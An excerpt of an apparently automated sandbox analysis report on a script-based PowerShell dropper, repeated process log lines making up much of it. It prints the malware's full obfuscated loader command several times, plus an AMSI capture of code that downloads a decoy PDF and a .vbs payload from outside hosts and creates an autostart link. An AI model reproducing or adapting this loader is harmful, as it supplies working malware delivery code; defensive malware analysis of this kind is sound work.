StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeJump to behavior
          Suspicious powershell command line found
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34987613 push edi; ret 0_2_00007FFD34987616
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD34980D6C push eax; ret 3_2_00007FFD34980D6D
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD349754A8 push ebp; iretd 6_2_00007FFD34975538

          Boot Survival

          barindex
          Powershell creates an autostart link
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of Required items and services.pdf') -oulv 'htt1ewww.fornid.com/wh/List%20of%20rfk6quirfk6d%20itfk6ms%20and%20sfk6rvicfk6s.pdf';getit -fz $flol -oulv 'htt1ewww.pinfk6applfk6tfk6ch.afk6/na/mg.vbs';exit@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell user required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this mod

          Hooking and other Techniques for Hiding and Protection

          barindex
          Loading BitLocker PowerShell Module
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
